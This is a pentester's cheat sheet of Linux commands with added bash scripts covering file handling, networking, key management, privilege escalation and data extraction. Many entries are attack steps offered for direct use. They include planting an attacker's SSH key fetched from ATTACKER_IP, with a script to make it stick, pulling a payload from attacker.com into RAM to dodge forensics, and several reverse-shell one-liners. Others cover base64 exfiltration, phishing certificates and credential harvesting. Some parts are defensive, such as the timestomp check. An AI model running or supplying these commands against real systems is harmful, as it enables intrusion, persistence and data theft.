Practical Linux Commands
In penetration testing, Linux commands can be incredibly powerful when used efficiently. The following guide provides practical Linux commands for pentesters, explaining what each command does and how it can help during an engagement. These commands cover file manipulation, networking, process monitoring, and more.
File Manipulation Commands
Base64 Encoding for Exfiltration
base64 -w 0 file
Encodes a file to Base64 with no line breaks, so the whole blob fits in one HTTP header, URL parameter, or command argument. Decode on the receiving side with base64 -d. Base64 is an encoding, not encryption: anything inspecting the traffic can decode it just as easily.
Hex Dump Without New Lines
xxd -p boot12.bin | tr -d '\n'
Converts a binary file into a single line of plain hex. With the line breaks removed the output can be dropped straight into a script or a payload variable; reverse it with xxd -r -p.
Public Key Injection
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
Appends an attacker's public key to the target user's authorized_keys file, giving the attacker SSH access as that user for as long as the line stays there (a persistence step, not an initial foothold: it needs write access to the home directory first). Two things trip this up in practice: curl refuses a self-signed certificate unless you add -k, and sshd ignores the file entirely when StrictModes is on and ~/.ssh is not 700 or authorized_keys is not 600, so create the directory with mkdir -p ~/.ssh and fix the permissions before relying on it.
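An added example, not code from the original page: the same key installation done in a way sshd will actually accept. It creates the directory with the permissions StrictModes requires and appends the key only once, so running it twice does not litter the file. The key line is a constructed placeholder and the optional home-directory argument exists so the function can be pointed at a scratch directory instead of the real $HOME.

```bash
#!/usr/bin/env bash
# Added example (not from the original page). Install an SSH public key into
# authorized_keys with the layout and permissions sshd's StrictModes expects.

# Constructed placeholder; in a real engagement substitute the output of
#   curl -fsS https://ATTACKER_IP/.ssh/id_rsa.pub
SAMPLE_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialOnlyForDemo0000000000 attacker@example'

# install_authorized_key <pubkey-line> [home-dir]
# Creates ~/.ssh (700) and authorized_keys (600) if missing and appends the key
# unless the exact line is already present, so the function is idempotent.
install_authorized_key() {
    local key="$1" home="${2:-$HOME}"
    local sshdir="$home/.ssh" auth
    auth="$sshdir/authorized_keys"
    mkdir -p "$sshdir" && chmod 700 "$sshdir"
    touch "$auth" && chmod 600 "$auth"
    # -x matches the whole line, -F treats the key as a fixed string (it contains '+' and '/').
    if ! grep -qxF "$key" "$auth"; then
        printf '%s\n' "$key" >> "$auth"
    fi
}

# key_installed <pubkey-line> [home-dir]
# Returns 0 only if the key appears exactly once and both paths have the
# permissions sshd will accept; anything else means the login would be refused.
key_installed() {
    local key="$1" home="${2:-$HOME}"
    local auth="$home/.ssh/authorized_keys"
    [ "$(stat -c %a "$home/.ssh")" = "700" ] || return 1
    [ "$(stat -c %a "$auth")" = "600" ] || return 1
    [ "$(grep -cxF "$key" "$auth")" = "1" ]
}

# Demonstration against a scratch directory so nothing on the real account changes.
demo_home=$(mktemp -d)
install_authorized_key "$SAMPLE_PUBKEY" "$demo_home"
install_authorized_key "$SAMPLE_PUBKEY" "$demo_home"   # second run is a no-op
if key_installed "$SAMPLE_PUBKEY" "$demo_home"; then
    echo "key installed once with sshd-compatible permissions under $demo_home"
fi
rm -rf "$demo_home"
```

On the target, call install_authorized_key with the fetched key and no second argument so it writes to the current user's home; key_installed is a quick self-check before you close the session you used to plant it.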
Count Lines in a File
wc -l <file>
Counts the number of lines in a file, useful for verifying the amount of output or checking logs.
Sort and Remove Duplicates
sort file | uniq
Sorts a file and removes duplicate lines (uniq only collapses adjacent duplicates, which is why the sort comes first; sort -u does both in one step). Add uniq -c to get a count per unique line, which is the quick way to spot the noisiest source in a log.
Find Files Modified Within a Date Range
find / -newermt 2023-08-01 ! -newermt 2023-08-05 -type f
Finds regular files whose modification time falls between the two dates, which narrows a filesystem down to what changed during a suspected intrusion window. The -newermt test looks at mtime, and mtime is trivial to forge with touch -d; the inode change time (ctime) cannot be set from userland without changing the system clock, so compare the two (stat -c '%y %z') before trusting a date that looks innocent.
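An added example, not part of the original page, that wraps the same find predicate in a function and adds the check the paragraph hints at: a file whose ctime is far later than its mtime had its mtime set by hand. The sample tree, file names and the backdated timestamp are constructed for the demonstration; it assumes GNU find and stat.

```bash
#!/usr/bin/env bash
# Added example (not from the original page). List files changed in a date
# window and flag likely timestomping by comparing mtime against ctime.

# files_modified_between <dir> <start YYYY-MM-DD> <end YYYY-MM-DD>
# Same predicate as the page's one-liner, restricted to one directory tree.
files_modified_between() {
    find "$1" -type f -newermt "$2" ! -newermt "$3" 2>/dev/null | sort
}

# timestomped <file> [tolerance-seconds]
# A normal write updates mtime and ctime together. `touch -d` rewrites mtime
# but the kernel stamps ctime with the real clock, so ctime - mtime grows
# beyond a few seconds only when the mtime was set by hand (or the clock moved).
timestomped() {
    local f="$1" tol="${2:-5}" m c
    m=$(stat -c %Y "$f")   # mtime, seconds since epoch
    c=$(stat -c %Z "$f")   # ctime, seconds since epoch
    [ $((c - m)) -gt "$tol" ]
}

# make_sample_tree <dir>: constructed tree with two fresh files and one file
# backdated into the window an attacker might want to hide inside.
make_sample_tree() {
    mkdir -p "$1/etc" "$1/tmp"
    printf 'recent\n' > "$1/etc/recent.conf"
    printf 'also recent\n' > "$1/tmp/notes.txt"
    printf 'planted\n' > "$1/etc/planted.conf"          # constructed name
    touch -d '2023-08-03 12:00:00' "$1/etc/planted.conf" # the forged mtime
}

# Demonstration on a scratch directory.
demo_dir=$(mktemp -d)
make_sample_tree "$demo_dir"
echo "mtime inside 2023-08-01..2023-08-05:"
files_modified_between "$demo_dir" 2023-08-01 2023-08-05
find "$demo_dir" -type f -print | while read -r f; do
    if timestomped "$f"; then
        echo "SUSPECT (ctime much later than mtime): $f"
    fi
done
rm -rf "$demo_dir"
```

Run against a real host the search shows only the planted file for the window, while the ctime comparison flags it regardless of which date was written into mtime. Files restored from a backup or extracted from an archive with preserved timestamps also trip the check, so treat a hit as a lead rather than proof.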
Networking and Communication Commands
Set Up an HTTP Server (Quick File Serving)
python3 -m http.server 80
Serves the current working directory over HTTP so the target can fetch payloads with wget or curl (or post data back with a small handler). Binding to port 80 needs root; as an unprivileged user pick a high port such as 8000, and use --directory to serve a specific folder rather than whatever you happen to be in. Every request is logged to the terminal, which doubles as confirmation that the target reached you.
Curl for Sending JSON Data
curl --header "Content-Type: application/json" --request POST --data '{"username":"admin","password":"password"}' http://target/endpoint
Sends JSON data to a web application, ideal for testing API endpoints or mimicking application behavior.
SSH Key Scanning
ssh-keyscan 10.10.10.101
Retrieves the host's public SSH keys (one line per key type) in known_hosts format; pipe the output through ssh-keygen -lf - to turn them into fingerprints. Comparing fingerprints across a range reveals hosts that share a host key, which usually means they were cloned from one image and makes host-key verification meaningless between them. The scan is unauthenticated and shows up in the sshd log as a connection with no login attempt.
System Monitoring & Process Management
List Open Files of Network Processes
lsof -i
Lists every process that holds a network socket, together with the local and remote endpoints. Add -nP to skip DNS and service-name lookups, which makes it faster and stops a reverse lookup from alerting anyone watching the resolver. This is the quickest way to find the process behind an open port or a connection you do not recognise.
Process Monitoring with ps
ps aux | grep apache
Lists every process on the system and filters the list by name (here apache). The grep line itself appears in the output; use pgrep -a apache or grep '[a]pache' if that bothers you. This is the fastest way to see which services are running and under which user.
Finding Network Connections
netstat -an | grep ESTABLISHED
Displays established network connections, which is where backdoors and connections to attacker-controlled servers show up. netstat is deprecated and often missing on modern systems; ss -tnp prints the same information plus the owning process.
Encryption and Key Management
Generate RSA Key
openssl genrsa -out attacker.key 2048
Creates an RSA key, which can be used for encrypted communication, establishing secure connections, or signing data.
Decrypt SSH Key
openssl rsa -in key.ssh.enc -out key.ssh
Strips the passphrase from a PEM-format private key (header BEGIN RSA PRIVATE KEY with a Proc-Type: 4,ENCRYPTED line, or BEGIN ENCRYPTED PRIVATE KEY). It prompts for the passphrase; it does not crack it. Keys in OpenSSH's own format (BEGIN OPENSSH PRIVATE KEY, the default since OpenSSH 7.8) are not understood by openssl rsa; remove their passphrase with ssh-keygen -p -N '' -f key instead, and if the passphrase is unknown convert the key with ssh2john and crack the hash offline.
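An added example, not from the original page, that picks the correct tool by reading the key header, since the wrong one fails with an unhelpful parse error. The header samples used for the demonstration are constructed one-line stand-ins for real keys; openssl and ssh-keygen are only invoked by decrypt_key, which still prompts for the passphrase.

```bash
#!/usr/bin/env bash
# Added example (not from the original page). Detect a private key's container
# format and dispatch to the tool that can actually read it.

# key_format <file>
# Prints one of: openssh | pkcs8-encrypted | pem-encrypted | pem-plain | unknown
key_format() {
    if grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
        echo openssh            # OpenSSH native format; openssl cannot parse it
    elif grep -q '^-----BEGIN ENCRYPTED PRIVATE KEY-----' "$1"; then
        echo pkcs8-encrypted    # PKCS#8, passphrase-protected
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo pem-encrypted      # traditional PEM (PKCS#1 / SEC1) with a passphrase
    elif grep -qE '^-----BEGIN (RSA |EC |DSA |)PRIVATE KEY-----' "$1"; then
        echo pem-plain          # PEM with no passphrase at all
    else
        echo unknown
    fi
}

# decrypt_key <in> <out>
# Writes an unprotected copy of the key to <out>. Every branch that needs the
# passphrase prompts for it on the terminal; nothing here guesses passphrases.
decrypt_key() {
    case "$(key_format "$1")" in
        pem-encrypted|pkcs8-encrypted)
            # openssl pkey handles RSA, EC and PKCS#8 alike; `openssl rsa` also works for RSA.
            openssl pkey -in "$1" -out "$2" ;;
        openssh)
            # ssh-keygen rewrites the key in place, so work on a copy.
            cp "$1" "$2" && chmod 600 "$2" && ssh-keygen -p -N '' -f "$2" ;;
        pem-plain)
            cp "$1" "$2" ;;
        *)
            echo "unrecognised key format: $1" >&2
            return 1 ;;
    esac
}

# Demonstration on constructed header stand-ins (real keys carry a body after the header).
demo_dir=$(mktemp -d)
printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\n' > "$demo_dir/modern.key"
printf -- '-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00\n' > "$demo_dir/legacy.key"
printf -- '-----BEGIN ENCRYPTED PRIVATE KEY-----\n' > "$demo_dir/pkcs8.key"
printf -- '-----BEGIN EC PRIVATE KEY-----\n' > "$demo_dir/ec.key"
for k in "$demo_dir"/*.key; do
    printf '%-12s %s\n' "$(key_format "$k")" "$k"
done
rm -rf "$demo_dir"
```

An unknown result usually means the file is a PuTTY .ppk or a certificate rather than a key; puttygen can convert the former to OpenSSH format before you retry.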
Create a Signed Certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Creates a self-signed certificate and matching unencrypted private key (-nodes) valid for a year, enough to stand up an HTTPS listener for a phishing page or an interception proxy. Because nothing trusts the certificate, browsers and well-behaved clients will show a warning or refuse the connection; the trick only works silently against clients that skip verification (curl -k, verify=False) or on machines where you can add your CA to the trust store.
Privilege Escalation Tools
Set Immutable Bit on a File
sudo chattr +i /path/to/file
Marks a file immutable so it cannot be modified, renamed or deleted, even by root, until the flag is removed with chattr -i. Setting it requires CAP_LINUX_IMMUTABLE (in practice root), so it is a persistence and anti-tampering trick rather than an escalation step: a planted cron job or authorized_keys file survives casual cleanup. Defenders can list flagged files with lsattr -R, which also makes the technique easy to spot.
Find SUID Binaries
find / -perm -4000 2>/dev/null
Lists every file with the SUID bit set (-perm -4000 matches any mode that includes it; 2>/dev/null hides the permission errors from directories you cannot read). Add -type f -ls to skip directories and see owner and size in one pass. Compare the list against a clean system of the same distribution: a SUID binary that is not part of the base install, or a standard tool such as find, vim or python with the bit set, is the usual route to root.
Exploitation Utilities
Download to RAM to Evade Detection
wget http://attacker.com/payload.py -O /dev/shm/payload.py
Writes the payload to /dev/shm, which is a tmpfs mounted in RAM rather than on disk. The file never reaches persistent storage, so it leaves nothing for post-mortem disk forensics and disappears on reboot; it is not invisible, though: ls, find and any scanner that walks the filesystem see it like any other file. On hardened hosts /dev/shm is mounted noexec, which blocks running a native binary from there but does not stop python3 /dev/shm/payload.py, since the interpreter reads the script rather than executing it.
Running a Reverse Shell with Netcat
nc -e /bin/bash 10.10.10.10 4444
Connects back from the target to the attacker's listener (nc -lvnp 4444 on 10.10.10.10) and hands it a shell, the standard way to turn a one-shot code-execution bug into an interactive session. The -e option only exists in the traditional netcat and in ncat; the OpenBSD netcat shipped by Debian and Ubuntu lacks it. Fallbacks that need no special netcat: bash -i >& /dev/tcp/10.10.10.10/4444 0>&1, or the named-pipe form rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 4444 > /tmp/f.
Advanced Grep for Data Extraction
Extract Emails
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt
Prints every email address found in a file, one per line (-o outputs only the match). Useful for harvesting contacts and usernames from dumps, mailboxes and source trees; pipe through sort -u to de-duplicate. The pattern caps the TLD at six letters, so addresses under longer TLDs are missed, and it will match anything address-shaped in binary junk.
Extract Passwords
grep -i "pwd\|pass\|password" file.txt
Prints lines containing pwd, pass or password, case-insensitively (the third alternative is redundant because pass already matches it). Run it with -r across configuration directories, shell histories and source trees during an internal test to find hard-coded credentials. Expect noise from words like bypass and passphrase, and remember the match is on the label, not the secret, so review each hit by hand.
Extract IP Addresses
grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" file.txt
Prints every dotted-quad string in a file, which is a quick way to pull hosts out of configs, logs and documentation for mapping. The pattern does not validate the octets: it happily matches 999.300.1.1 and version strings such as 10.2.33.4, so filter the output (each field at most 255) before feeding it to a scanner.
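An added example, not code from the original page, that wraps the three grep patterns above in functions and adds the octet filter the IP pattern lacks. The input text is constructed and includes the false positives each pattern is prone to.

```bash
#!/usr/bin/env bash
# Added example (not from the original page). The page's extraction patterns as
# reusable filters, with validation of the IP matches.

# Constructed sample: a mix of genuine and junk matches for each extractor.
SAMPLE_TEXT='Contact: alice@example.com, bob.smith+ops@corp.example.org
db_pass=Sup3rS3cret  PWD=hunter2  passphrase missing
listen on 10.10.10.101:22 and 192.168.1.254; bogus 999.300.1.1; version 10.2.33.4
smtp relay at mail.example.net, admin@localhost is not a routable address
compass heading set; bypass rules apply here'

# extract_emails: stdin -> unique email addresses, one per line
extract_emails() {
    grep -E -o '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b' | sort -u
}

# extract_password_lines: stdin -> lines that mention a credential label.
# "pass" already covers "password", so the alternation is shortened.
extract_password_lines() {
    grep -iE 'pwd|pass'
}

# extract_ips: stdin -> unique dotted quads whose octets are all <= 255.
# awk splits on '.' and compares numerically, dropping 999.300.1.1-style junk.
extract_ips() {
    grep -E -o '([0-9]{1,3}\.){3}[0-9]{1,3}' \
        | awk -F. '$1 <= 255 && $2 <= 255 && $3 <= 255 && $4 <= 255' \
        | sort -u
}

# Demonstration on the constructed text.
echo "emails:";          printf '%s\n' "$SAMPLE_TEXT" | extract_emails
echo "credential lines:"; printf '%s\n' "$SAMPLE_TEXT" | extract_password_lines
echo "ip addresses:";    printf '%s\n' "$SAMPLE_TEXT" | extract_ips
```

The credential filter still returns the "bypass" line and the IP filter still accepts 10.2.33.4, which is syntactically a valid address even though in the sample it is a version number: regexes find candidates, and the reviewer decides.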
Miscellaneous Commands
Change Timezone
sudo dpkg-reconfigure tzdata
Changes the system's timezone interactively on Debian-based systems (timedatectl set-timezone Region/City does the same on any systemd host). Note what it does not do: filesystem timestamps and most log timestamps are stored as UTC epoch values, so changing the zone only alters how they are displayed, not the recorded times, and forensic tools normalise to UTC anyway. It is useful for making a foothold's local time match the target's environment, not for rewriting history.
Mount Virtual Hard Drives
guestmount --add NAME.vhd --inspector --ro /mnt/vhd
Mounts a VHD image read-only at /mnt/vhd, auto-detecting the operating system and partitions inside it (--inspector), so the guest's files can be searched and copied without ever booting it. It needs libguestfs-tools installed and runs entirely in userspace; detach with guestunmount /mnt/vhd when done. Drop --ro only if you intend to modify the image.